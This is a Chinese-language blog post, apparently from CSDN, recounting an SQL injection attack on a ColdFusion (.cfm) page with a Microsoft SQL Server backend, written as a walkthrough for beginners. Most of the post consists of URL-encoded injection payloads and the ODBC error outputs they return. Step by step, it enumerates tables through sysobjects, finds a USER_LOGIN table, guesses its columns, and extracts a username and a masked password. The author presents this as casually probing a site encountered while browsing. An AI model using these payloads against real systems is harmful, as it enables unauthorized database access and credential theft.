对cfm的一个攻击实例

最新推荐文章于 2019-02-14 11:11:46 发布
最新推荐文章于 2019-02-14 11:11:46 发布
阅读量1k 收藏
点赞数
分类专栏: 我的收藏-->Hacker's log 文章标签: sql server microsoft login user processing asp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/net0r/article/details/43103
版权

好郁闷,快考试了,抽空上上网。到这个地址的时候,习惯性的看看他有没有安全漏洞
http://www.test.com/openaccess/index.cfm?ID=11
提交
http://www.test.com/openaccess/index.cfm?ID=11;
返回
Error Occurred While Processing Request
Error Diagnostic Information
ODBC Error Code = 37000 (Syntax error or access violation)


[Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near the keyword ’order’.


The error occurred while processing an element with a general identifier of (CFQUERY), occupying document position (72:1) to (72:47).


Date/Time: 06/05/04 13:37:57
Browser: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Remote Address: 61.178.21.189
Query String: ID=11;

其实cfm的攻击也和asp一样简单,看上面的返回信息,比asp的返回还详细。
不过好象对cfm很少有人写,所以就写出来了。上面是mssql的数据库,很多方法都可以用,
为了面向广大的菜鸟爱好者,这里就只说说怎么爆表吧。

对asp的跨cool大家都很熟悉了吧,那么,现在来cool一把cfm!!

提交:
and 0=(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)

郁闷,没返回我们期待的东西,他不给我,我就换方法要,再来。

提交:
and%201=(Select%20top%201%20name%20from(Select%20top%2012%20id,name%20from%20sysobjects%20where%20xtype=char(85))%20T%20order%20by%20id%20desc)

返回:
Error Diagnostic Information
ODBC Error Code = 22005 (Error in assignment)


[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ’ANALYST_MST’ to a column of data type int.

The error occurred while processing an element with a general identifier of (CFQUERY), occupying document position (50:2) to (50:51).
。。。。。。
看到了吧,哈哈,小竹的这个语句就是猛啊!
现在就一个一个查吧,换掉top%201%20name中的1,从1开始,到6的时候,返回一个期待的东西
。。。。。。。
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ’USER_LOGIN’ to a column of data type int.
。。。。。。。

看见USER_LOGIN表了吧?说不定就有密码在里面。
现在就看看里面有什么东西:(胜利就在眼前了,冲啊。。。)
提交:
and%201=(Select%20Top%201%20col_name(object_id(’USER_LOGIN’),1)%20from%20sysobjects)
返回:
。。。。。
Microsoft][ODBC SQL Server Driver][SQL Server]Line 2: Incorrect syntax near ’USER_LOGIN’.
。。。。。
我倒!!怎么这样!吸根烟再说。干脆用猜吧,像
and 1=(select%20user_id%20from%20USER_LOGIN)
猜不出来再说了。。。

出来了,哈哈,user_id,
连续提交,得到几个字段
user_id user password,没办法啊,100%的猜中率。
好了,已经到了最后一步了,我们继续来啊!!

and%200=(select%20user%20from%20USER_LOGIN%20where%20user>1)

出来了,用户是kimeng,下面爆他的密码:

and%200=(select%20password%20from%20USER_LOGIN%20where%20password>1)

哈哈,出来了,不好意思,马赛克处理*****

随便写写,没什么技术活。

http://www.itlearner.com/work/hexsql.asp

net0r
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CFM 学习总结
marshalsoul的专栏
10-12 5977
1、概述       802.1ag是一种网络级以太网 OAM 技术,多应用于网络的接入汇聚层,用于监测整个网络的连通性、定位网络的连通性故障。它提供了以下几个功能 路径发现(Path discovery) 故障检测(Fault detection) 故障确认和定位(Fa
以太网OAM和CFM的基本概念、配置和应用
热门推荐
风起怨江南
05-05 1万+
笔者:风起怨江南出处:https://blog.csdn.net/JackMengJin文章转载请注明,如果喜欢请点赞+关注,感谢支持! 由于工作需要,对CFM协议技术(连接故障管理技术)进行研究和学习,部分资料参考cisco文档,并附上相关链接。 参考资料:https://www.cisco.com/c/zh_cn/support/docs/asynchronous-transfer...
MAX10系列FPGA设计案例简述
haoxingheng的专栏
12-13 8591
基于Intel(Altera)MAX10系列FPGA的设计案例简述 ...
MAX10出现memory initialization错误
08-14 8378
  Error (14703): Invalid internal configuration mode for design with memory initialization 这是因为,  configuration mode 不对 改成如下
MAX10片内User Flash的使用
ffdia的博客
02-14 5441
一、Altera MAX10 FPGA片内Flash介绍        MAX 10 FPGA 采用 TSMC 的 55 nm 嵌入式 NOR 闪存技术制造,并提供双配置CFM(Configration Flash Memery )和UFM(User Flash Memery)。配置灵活支持双配置,也支持CFM与UFM相互共享。不同型号的片子对应最大的UFM容量从Quartus软件里面即可找到:...
cfm:您将需要的最后一个文件管理器
03-22
cfm 为什么? 有。不幸的是,它们都是 ,这意味着它们会错过CLI的许多好处:效率,可编写脚本性和速度。尽管我从未在网上看到它,但这确实归结于CLI与TUI的争论。 cfm目的是使使用CLI的文件管理比以前使用coreutils...
CFM.rar_cfm_报警
09-23
项目工程源代码 除了lib之外,都在里边了,甚至连图片都有
cfm.rar_cfm_koch
09-20
a business unit of Schneider & Koch & Co. Datensysteme GmbH.
CFM技术白皮书
07-30
CFM一个建立服务以太网OAM的功能标准,用以提高电信以太网的运营、维护、管理的实现。本文主要介绍了CFM的基本实现方式、特点以及一些基本应用实现。
联想CFM1D3M主板BIOS,CFM1D3M主板图纸 CFM1D3M点位图
08-04
联想CFM1D3M主板BIOS,CFM1D3M主板图纸 CFM1D3M点位图 里面包含 编程器BIOS, 主板图纸 点位图。维修必备。这个主板通病是USB无5V,BIOS芯片掉数据。
【MAX10评测】(四)配置
weixin_30455661的博客
03-07 1273
一般FPGA属于易失性芯片,类似于RAM,芯片上的数据和程序在掉电后不会保留,上电后程序需要从外部非易失性芯片加载,如EPCS系列芯片,也可以通过FPGA上JTAG接口或者串行接口写入。 ▲而MAX 10系列FPGA的配置则很灵活,因其芯片内嵌配置闪存模块CFM(Configuration Flash Memory),可用于存放程序映象。如上图所示。MA...
epm3032 很小的Altera cpld 32个脚
gtkknd的专栏
10-20 4068
epm3032 很小的Altera cpld  32个脚, 这么小的CPLD  很有用啊
MAX10 ADC的一些基知识
weixin_30868855的博客
04-15 478
MAX10 ADC 的一些知识 1、 MAX 10 内部集成的12bit SAR ADC的特点为: a、 采样速率高达1Mhz. b、 模拟通道多达18个,单个ADC多达17个,双ADC器件中有16个双功能ADC通道,2个专用的ADC。 c、 提供单端测量功能。 d、 双ADC器件的专用模拟输入管脚具备同步测量功能。...
max10之pll时钟源切换
weixin_30632089的博客
06-01 213
问题3:PLL切换功能中,多次切换可能造成PLL锁不定 从现象看clkbadx信号是不影响的,但locked信号一定是有影响的。 转载于:https://www.cnblogs.com/zhongguo135/p/9120997.html...
怎样在Mysql中直接储存图片
net0r的专栏
10-22 4778
作者: Florian Dittmer 翻译:netmad 如果你想把二进制的数据,比如说图片文件和HTML文件,直接保存在你的MySQL数据库,那么这篇文章就是为你而写的! 我将告诉你怎样通过HTML表单来储存这些文件,怎样访问和使用这些文件。 本文概述: 在mysql中建立一个新的数据库 一个怎样储存文件的例子程序 一个怎样访问文件的例子程序 在mysql中建立一个新的database 首先,
delphi service
net0r的专栏
08-09 2252
program Project1;uses? SvcMgr,? service in service.pas {netor1: TService},? thread in thread.pas;{$R *.RES}begin? Application.Initialize;? Application.CreateForm(Tnetor1, netor1);? Applicati
Some useful techniques in hijacking
net0r的专栏
07-27 1399
1.HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/Tcpip/Parameters/,将IPEnableRouter的值改为16进制的1,这样就开启了ip路由功能。 xhijack 192.168.0.1 192.168.0.3,选择2号适配器,输入l命令来查看连接。如图八。图上清清楚楚的写着:(1)192.168.0.1:23192.1
php 中用 Javascript 进行客户端数据检验
net0r的专栏
07-16 1312
这是一个检验用户EMAIL地址的例子,和以前众多的PHP正则表达式对应 function verifyAddress(obj) { // obtain form value into variable var email = obj.email.value; // define regex var pattern = /^([a-zA-Z0-9_-])+@([a-zA-Z0-9_-])+(/
0x00 vs ASP file upload scripts
net0r的专栏
07-21 1250
Copyright Security-Assessment.com Ltd 2004White PaperTitle: 0x00 vs ASP file upload scriptsPrepared by: Brett MooreNetwork Intrusion SpecialistSecurity-Assessment.comDate: 13 July 200413/07/2004 Page
CFM报文R-APS
最新发布
07-27
R-APS是一种用于以太网连接的冗余自动保护切换机制。它可以在网络中的故障发生时,自动切换到备用路径,以确保网络的连通性和可靠性。R-APS功能通过在CFM报文中传输特定的R-APS帧来实现。这些帧用于通知网络中的设备...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值